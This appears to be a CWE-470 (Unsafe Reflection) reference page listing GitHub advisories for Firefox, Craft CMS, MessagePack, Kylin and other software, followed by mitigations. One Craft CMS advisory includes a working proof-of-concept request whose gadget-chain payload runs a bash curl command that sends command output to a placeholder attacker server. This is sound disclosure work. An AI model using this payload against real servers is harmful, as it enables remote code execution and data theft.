CWE-470
AllowedUse of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
Abstraction: Base · Status: Draft
The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.
111 vulnerabilities reference this CWE, most recent first.
GHSA-JPG7-857P-MPQG
Vulnerability from github – Published: 2023-07-05 09:30 – Updated: 2024-04-04 05:23A website could have obscured the fullscreen notification by using a URL with a scheme handled by an external program, such as a mailto URL. This could have led to user confusion and possible spoofing attacks. This vulnerability affects Firefox < 115, Firefox ESR < 102.13, and Thunderbird < 102.13.
{
"affected": [],
"aliases": [
"CVE-2023-37207"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-05T09:15:09Z",
"severity": "MODERATE"
},
"details": "A website could have obscured the fullscreen notification by using a URL with a scheme handled by an external program, such as a mailto URL. This could have led to user confusion and possible spoofing attacks. This vulnerability affects Firefox \u003c 115, Firefox ESR \u003c 102.13, and Thunderbird \u003c 102.13.",
"id": "GHSA-jpg7-857p-mpqg",
"modified": "2024-04-04T05:23:17Z",
"published": "2023-07-05T09:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37207"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1816287"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00006.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00015.html"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2023/dsa-5450"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2023/dsa-5451"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2023-22"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2023-23"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2023-24"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-M7G5-QWGM-89MC
Vulnerability from github – Published: 2024-07-04 09:32 – Updated: 2026-04-08 15:31Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in the licensing feature of ICONICS GENESIS64 versions 10.97 to 10.97.2, Mitsubishi Electric GENESIS64 versions 10.97 to 10.97.2 and Mitsubishi Electric MC Works64 all versions allows a local attacker to execute a malicious code with administrative privileges by tampering with a specific file that is not protected by the system.
{
"affected": [],
"aliases": [
"CVE-2024-1574"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-04T09:15:03Z",
"severity": "MODERATE"
},
"details": "Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027) vulnerability in the licensing feature of ICONICS GENESIS64 versions 10.97 to 10.97.2, Mitsubishi Electric GENESIS64 versions 10.97 to 10.97.2 and Mitsubishi Electric MC Works64 all versions allows a local attacker to execute a malicious code with administrative privileges by tampering with a specific file that is not protected by the system.",
"id": "GHSA-m7g5-qwgm-89mc",
"modified": "2026-04-08T15:31:42Z",
"published": "2024-07-04T09:32:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1574"
},
{
"type": "WEB",
"url": "https://jvn.jp/vu/JVNVU98894016"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-184-03"
},
{
"type": "WEB",
"url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2024-004_en.pdf"
},
{
"type": "WEB",
"url": "https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2024-004_en.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M92M-R54R-X8R2
Vulnerability from github – Published: 2026-06-26 22:15 – Updated: 2026-06-26 22:15Impact
The fix for GHSA-4jjr-vmv7-wh4w was incomplete. It addressed the issue in the query builder, but the same protection was not applied to in-memory collection sorting. Manipulating sort parameters could result in the loss of content and assets.
This requires a front-end template that passes request input into a tag's sort parameter. It is not exploitable by default — a template would need to be explicitly set up to sort by a visitor-controlled value.
Patches
This has been fixed in 5.73.23 and 6.20.0.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "statamic/cms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.73.23"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "statamic/cms"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.20.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-49287"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T22:15:47Z",
"nvd_published_at": "2026-06-19T18:16:19Z",
"severity": "HIGH"
},
"details": "### Impact\n\nThe fix for GHSA-4jjr-vmv7-wh4w was incomplete. It addressed the issue in the query builder, but the same protection was not applied to in-memory collection sorting. Manipulating sort parameters could result in the loss of content and assets.\n\nThis requires a front-end template that passes request input into a tag\u0027s sort parameter. It is not exploitable by default \u2014 a template would need to be explicitly set up to sort by a visitor-controlled value.\n\n### Patches\n\nThis has been fixed in 5.73.23 and 6.20.0.",
"id": "GHSA-m92m-r54r-x8r2",
"modified": "2026-06-26T22:15:47Z",
"published": "2026-06-26T22:15:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/statamic/cms/security/advisories/GHSA-4jjr-vmv7-wh4w"
},
{
"type": "WEB",
"url": "https://github.com/statamic/cms/security/advisories/GHSA-m92m-r54r-x8r2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49287"
},
{
"type": "PACKAGE",
"url": "https://github.com/statamic/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Statamic CMS\u0027s unsafe method invocation via collection sorting allows data destruction"
}
GHSA-P2H6-PJF9-J879
Vulnerability from github – Published: 2024-10-09 15:32 – Updated: 2025-11-03 21:31In Progress Telerik Reporting versions prior to 2024 Q3 (18.2.24.924), a code execution attack is possible through object injection via an insecure type resolution vulnerability.
{
"affected": [],
"aliases": [
"CVE-2024-8014"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-09T15:15:16Z",
"severity": "HIGH"
},
"details": "In Progress Telerik Reporting versions prior to 2024 Q3 (18.2.24.924), a code execution attack is possible through object injection via an insecure type resolution vulnerability.",
"id": "GHSA-p2h6-pjf9-j879",
"modified": "2025-11-03T21:31:15Z",
"published": "2024-10-09T15:32:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8014"
},
{
"type": "WEB",
"url": "https://docs.telerik.com/reporting/knowledge-base/insecure-type-resolution-cve-2024-8014"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250425-0004"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PQ9P-WFFW-C523
Vulnerability from github – Published: 2023-09-11 21:30 – Updated: 2024-04-04 07:36In multiple locations, there is a possible way to import contacts belonging to other users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2023-35680"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-11T21:15:42Z",
"severity": "MODERATE"
},
"details": "In multiple locations, there is a possible way to import contacts belonging to other users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.",
"id": "GHSA-pq9p-wffw-c523",
"modified": "2024-04-04T07:36:50Z",
"published": "2023-09-11T21:30:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35680"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/packages/services/Telephony/+/674039e70e1c5bf29b808899ac80c709acc82290"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2023-09-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-Q656-G2X3-8CGH
Vulnerability from github – Published: 2022-01-08 00:43 – Updated: 2022-01-07 23:21Kylin can receive user input and load any class through Class.forName(...). This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.kylin:kylin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.kylin:kylin"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.0.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"4.0.0"
]
}
],
"aliases": [
"CVE-2021-31522"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2022-01-07T23:21:51Z",
"nvd_published_at": "2022-01-06T13:15:00Z",
"severity": "MODERATE"
},
"details": "Kylin can receive user input and load any class through Class.forName(...). This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.",
"id": "GHSA-q656-g2x3-8cgh",
"modified": "2022-01-07T23:21:51Z",
"published": "2022-01-08T00:43:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31522"
},
{
"type": "WEB",
"url": "https://github.com/apache/kylin/pull/1695"
},
{
"type": "WEB",
"url": "https://github.com/apache/kylin/pull/1763"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/kylin"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/hh5crx3yr701zd8wtpqo1mww2rlkvznw"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/01/06/4"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Kylin can receive user input and load any class through Class.forName(...)."
}
GHSA-QHMF-XW27-6RQR
Vulnerability from github – Published: 2026-06-25 21:31 – Updated: 2026-06-25 21:31Summary
MessagePack-CSharp's typeless deserialization includes MessagePackSerializerOptions.ThrowIfDeserializingTypeIsDisallowed(Type) as a safety check for dangerous types. The default implementation checks the outer type name, but it does not recursively inspect array element types or generic type arguments.
As a result, a type that would be blocked directly can be wrapped inside an array or constructed generic type and pass the outer type check. The formatter machinery can then materialize formatters for the inner blocked type.
Impact
Applications are affected when they deserialize untrusted payloads using typeless serialization features such as MessagePackSerializer.Typeless, TypelessObjectResolver, or related typeless resolver options.
Typeless deserialization is already a high-risk feature for untrusted data, but the presence of a disallowed-type hook creates an expectation that blocked types remain blocked. This issue weakens that mitigation because the check is not applied structurally to nested type components. An attacker who can supply typeless ext-100 payloads may bypass exact outer-type blocklist checks by naming wrapper types such as arrays or generic containers.
The consequence depends on which type is reached and what the application allows typeless deserialization to instantiate. The original findings describe bypasses involving blocked or user-blocklisted gadget types.
Affected components
- Package:
MessagePack - Feature: typeless deserialization
- APIs:
MessagePackSerializerOptions.ThrowIfDeserializingTypeIsDisallowed,TypelessFormatter - Finding IDs:
MESSAGEPACKCSHARP-030, duplicate/open variantMESSAGEPACKCSHARP-OPEN-007
Patches
Fixes are available via versions 2.5.301 and 3.1.7.
Upgrade guidance:
- Upgrade
MessagePackto the patched version for your release line. - Upgrade companion MessagePack packages in the same dependency graph to the coordinated patched versions.
The fix should apply type-disallow checks recursively to array element types, pointer/byref element types where applicable, nullable underlying types, and constructed generic type arguments. Formatter paths that materialize types supplied by the wire should not instantiate inner types that fail the configured policy.
Workarounds
Patching is recommended.
Avoid typeless deserialization for untrusted data. If typeless support is unavoidable, configure an explicit allowlist that rejects any type not approved by the application and ensure the allowlist recursively validates array elements and generic arguments. Do not rely on exact outer-type blocklists as a complete security boundary.
Resources
MESSAGEPACKCSHARP-030: typeless disallowed-type check is not recursiveMESSAGEPACKCSHARP-OPEN-007: duplicate/open finding for typeless blocklist gaps- CWE-502: Deserialization of Untrusted Data
- CWE-470: Use of Externally-Controlled Input to Select Classes or Code
CVE split rationale
This vulnerability is independently fixable in typeless type-policy enforcement. It is separate from MVC default options, collection allocation, LZ4 decoding, and recursion-depth issues.
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "MessagePack"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.301"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "MessagePack"
},
"ranges": [
{
"events": [
{
"introduced": "3.0"
},
{
"fixed": "3.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48517"
],
"database_specific": {
"cwe_ids": [
"CWE-470",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-25T21:31:13Z",
"nvd_published_at": "2026-06-22T22:16:48Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nMessagePack-CSharp\u0027s typeless deserialization includes `MessagePackSerializerOptions.ThrowIfDeserializingTypeIsDisallowed(Type)` as a safety check for dangerous types. The default implementation checks the outer type name, but it does not recursively inspect array element types or generic type arguments.\n\nAs a result, a type that would be blocked directly can be wrapped inside an array or constructed generic type and pass the outer type check. The formatter machinery can then materialize formatters for the inner blocked type.\n\n## Impact\n\nApplications are affected when they deserialize untrusted payloads using typeless serialization features such as `MessagePackSerializer.Typeless`, `TypelessObjectResolver`, or related typeless resolver options.\n\nTypeless deserialization is already a high-risk feature for untrusted data, but the presence of a disallowed-type hook creates an expectation that blocked types remain blocked. This issue weakens that mitigation because the check is not applied structurally to nested type components. An attacker who can supply typeless ext-100 payloads may bypass exact outer-type blocklist checks by naming wrapper types such as arrays or generic containers.\n\nThe consequence depends on which type is reached and what the application allows typeless deserialization to instantiate. The original findings describe bypasses involving blocked or user-blocklisted gadget types.\n\n## Affected components\n\n- Package: `MessagePack`\n- Feature: typeless deserialization\n- APIs: `MessagePackSerializerOptions.ThrowIfDeserializingTypeIsDisallowed`, `TypelessFormatter`\n- Finding IDs: `MESSAGEPACKCSHARP-030`, duplicate/open variant `MESSAGEPACKCSHARP-OPEN-007`\n\n## Patches\n\nFixes are available via versions 2.5.301 and 3.1.7.\n\nUpgrade guidance:\n\n1. Upgrade `MessagePack` to the patched version for your release line.\n2. Upgrade companion MessagePack packages in the same dependency graph to the coordinated patched versions.\n\nThe fix should apply type-disallow checks recursively to array element types, pointer/byref element types where applicable, nullable underlying types, and constructed generic type arguments. Formatter paths that materialize types supplied by the wire should not instantiate inner types that fail the configured policy.\n\n## Workarounds\n\nPatching is recommended.\n\nAvoid typeless deserialization for untrusted data. If typeless support is unavoidable, configure an explicit allowlist that rejects any type not approved by the application and ensure the allowlist recursively validates array elements and generic arguments. Do not rely on exact outer-type blocklists as a complete security boundary.\n\n## Resources\n\n- `MESSAGEPACKCSHARP-030`: typeless disallowed-type check is not recursive\n- `MESSAGEPACKCSHARP-OPEN-007`: duplicate/open finding for typeless blocklist gaps\n- CWE-502: Deserialization of Untrusted Data\n- CWE-470: Use of Externally-Controlled Input to Select Classes or Code\n\n## CVE split rationale\n\nThis vulnerability is independently fixable in typeless type-policy enforcement. It is separate from MVC default options, collection allocation, LZ4 decoding, and recursion-depth issues.",
"id": "GHSA-qhmf-xw27-6rqr",
"modified": "2026-06-25T21:31:13Z",
"published": "2026-06-25T21:31:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MessagePack-CSharp/MessagePack-CSharp/security/advisories/GHSA-qhmf-xw27-6rqr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48517"
},
{
"type": "PACKAGE",
"url": "https://github.com/MessagePack-CSharp/MessagePack-CSharp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "MessagePack-CSharp: Typeless deserialization type restrictions do not recurse into arrays or generic arguments"
}
GHSA-QRGM-P9W5-RRFW
Vulnerability from github – Published: 2026-05-06 17:54 – Updated: 2026-05-13 16:29We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.
This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.
The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.
This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.
We were able to reproduce the attack by issuing a POST request to /admin/actions/element-search/search with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same beforeAction() path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:
``` POST /admin/actions/element-search/search HTTP/2 Host: hostnamehere Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...; Content-Length: … User-Agent: Mozilla/5.0 X-Csrf-Token: ... Accept: application/json Content-Type: application/json
{
"elementType": "craft\elements\Category",
"siteId": 1,
"search": "",
"condition": {
"class": "craft\elements\conditions\ElementCondition",
"elementType": "craft\elements\Category",
"fieldLayouts": [
{
"as rce": {
"__class": "yii\behaviors\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": [
"Psy\Readline\Hoa\ConsoleProcessus",
"execute"
]
},
"typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/id](https://yourcollaboratorservergoeshere/%60id%60/)""
}
]
},
"on *": "self::beforeSave"
}
]
}
}
```
Resources
https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.17.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.9.18"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44011"
],
"database_specific": {
"cwe_ids": [
"CWE-470",
"CWE-479"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T17:54:06Z",
"nvd_published_at": "2026-05-12T21:16:15Z",
"severity": "HIGH"
},
"details": "We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii\u2019s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command \u201cid\u201d for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: \u2026\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n \"elementType\": \"craft\\\\elements\\\\Category\",\n \"siteId\": 1,\n \"search\": \"\",\n \"condition\": {\n \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n \"elementType\": \"craft\\\\elements\\\\Category\",\n \"fieldLayouts\": [\n {\n \"as rce\": {\n \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n \"__construct()\": [\n {\n \"attributeTypes\": {\n \"typecastBeforeSave\": [\n \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n \"execute\"\n ]\n },\n \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n }\n ]\n },\n \"on *\": \"self::beforeSave\"\n }\n ]\n }\n}\n```\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
"id": "GHSA-qrgm-p9w5-rrfw",
"modified": "2026-05-13T16:29:16Z",
"published": "2026-05-06T17:54:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44011"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior"
}
GHSA-QX2Q-Q59V-WF3J
Vulnerability from github – Published: 2026-03-16 18:12 – Updated: 2026-03-16 21:57The fix for GHSA-7jx7-3846-m7w7 (commit 395c64f0b80b507be1c862a2ec942eaacb353748) only patched src/services/Fields.php, but the same vulnerable pattern exists in EntryTypesController::actionApplyOverrideSettings().
In src/controllers/EntryTypesController.php lines 381-387:
$settingsStr = $this->request->getBodyParam('settings');
parse_str($settingsStr, $postedSettings);
$settingsNamespace = $this->request->getRequiredBodyParam('settingsNamespace');
$settings = array_filter(ArrayHelper::getValue($postedSettings, $settingsNamespace, []));
if (!empty($settings)) {
Craft::configure($entryType, $settings);
The $settings array from parse_str is passed directly to Craft::configure() without Component::cleanseConfig(). This allows injecting Yii2 behavior/event handlers via as or on prefixed keys, the same attack vector as the original advisory.
You need Craft control panel administrator permissions, and allowAdminChanges must be enabled for this to work.
An attacker can use the same gadget chain from the original advisory to achieve RCE.
Users should update to Craft 5.9.11 to mitigate the issue.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.9.10"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.6.0"
},
{
"fixed": "5.9.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32263"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-16T18:12:32Z",
"nvd_published_at": "2026-03-16T20:16:19Z",
"severity": "HIGH"
},
"details": "The fix for GHSA-7jx7-3846-m7w7 (commit 395c64f0b80b507be1c862a2ec942eaacb353748) only patched `src/services/Fields.php`, but the same vulnerable pattern exists in `EntryTypesController::actionApplyOverrideSettings()`.\n\nIn `src/controllers/EntryTypesController.php` lines 381-387:\n\n```php\n$settingsStr = $this-\u003erequest-\u003egetBodyParam(\u0027settings\u0027);\nparse_str($settingsStr, $postedSettings);\n$settingsNamespace = $this-\u003erequest-\u003egetRequiredBodyParam(\u0027settingsNamespace\u0027);\n$settings = array_filter(ArrayHelper::getValue($postedSettings, $settingsNamespace, []));\n\nif (!empty($settings)) {\n Craft::configure($entryType, $settings);\n```\n\nThe `$settings` array from `parse_str` is passed directly to `Craft::configure()` without `Component::cleanseConfig()`. This allows injecting Yii2 behavior/event handlers via `as ` or `on ` prefixed keys, the same attack vector as the original advisory.\n\nYou need Craft control panel administrator permissions, and `allowAdminChanges` must be enabled for this to work.\n\nAn attacker can use the same gadget chain from the original advisory to achieve RCE.\n\nUsers should update to Craft 5.9.11 to mitigate the issue.",
"id": "GHSA-qx2q-q59v-wf3j",
"modified": "2026-03-16T21:57:33Z",
"published": "2026-03-16T18:12:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-qx2q-q59v-wf3j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32263"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/d37389dbffafa565143be40a2ab1e1db22a863f7"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS vulnerable to behavior injection RCE via EntryTypesController"
}
GHSA-R4H2-77R7-2XCH
Vulnerability from github – Published: 2022-05-24 16:57 – Updated: 2024-04-04 02:08It was found that the fix for CVE-2014-0114 had been reverted in JBoss Operations Network 3 (JON). This flaw allows attackers to manipulate ClassLoader properties on a vulnerable server. Exploits that have been published rely on ClassLoader properties that are exposed such as those in JON 3. Additional information can be found in the Red Hat Knowledgebase article: https://access.redhat.com/site/solutions/869353. Note that while multiple products released patches for the original CVE-2014-0114 flaw, the reversion described by this CVE-2019-3834 flaw only occurred in JON 3.
{
"affected": [],
"aliases": [
"CVE-2019-3834"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-03T14:15:00Z",
"severity": "HIGH"
},
"details": "It was found that the fix for CVE-2014-0114 had been reverted in JBoss Operations Network 3 (JON). This flaw allows attackers to manipulate ClassLoader properties on a vulnerable server. Exploits that have been published rely on ClassLoader properties that are exposed such as those in JON 3. Additional information can be found in the Red Hat Knowledgebase article: https://access.redhat.com/site/solutions/869353. Note that while multiple products released patches for the original CVE-2014-0114 flaw, the reversion described by this CVE-2019-3834 flaw only occurred in JON 3.",
"id": "GHSA-r4h2-77r7-2xch",
"modified": "2024-04-04T02:08:30Z",
"published": "2022-05-24T16:57:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3834"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3834"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
Mitigation
Refactor your code to avoid using reflection.
Mitigation
Do not use user-controlled inputs to select and load classes or code.
Mitigation
Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code.
CAPEC-138: Reflection Injection
An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.